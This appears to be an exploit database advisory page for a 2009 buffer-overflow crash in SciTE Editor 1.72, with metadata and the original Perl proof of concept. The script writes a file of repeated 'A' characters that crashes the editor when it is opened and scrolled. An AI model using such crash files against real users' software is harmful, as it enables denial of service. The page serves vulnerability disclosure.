ScITE Editor 1.72 crash vulnerability Exploit

vendor:

SciTE Editor

by:

prodigy

7,5

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: SciTE Editor

Affected Version From: 1.72

Affected Version To: 1.72

Patch Exists: YES

Related CWE: N/A

CPE: a:scintilla:scite

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

ScITE Editor 1.72 crash vulnerability Exploit

A buffer overflow vulnerability exists in SciTE Editor 1.72 when a specially crafted file is opened. When the file is opened, the scroll bars are moved which causes a crash. The PoC creates a file with 5000 A characters and when opened with SciTE Editor 1.72, it causes a crash.

Mitigation:

Upgrade to the latest version of SciTE Editor.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#######################################################################
#
#                    ScITE Editor 1.72 crash vulnerability Exploit
#            
########################################################################
#
#		          Bug Founded by prodigy
#
########################################################################

# ###                                 PoC                           ### #

############################################################################################
my $owned="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open(myfile,'>>crash.rb');
print myfile $owned;
close(myfile);
############################################################################################

[!]Usage: when you created the file is open with SciTE, and move the scroll bars

############################################################################################

#Greetz: Greetz myself for find the bug, and all the people of undersecurity.net

##########################################################################################

# milw0rm.com [2009-07-13]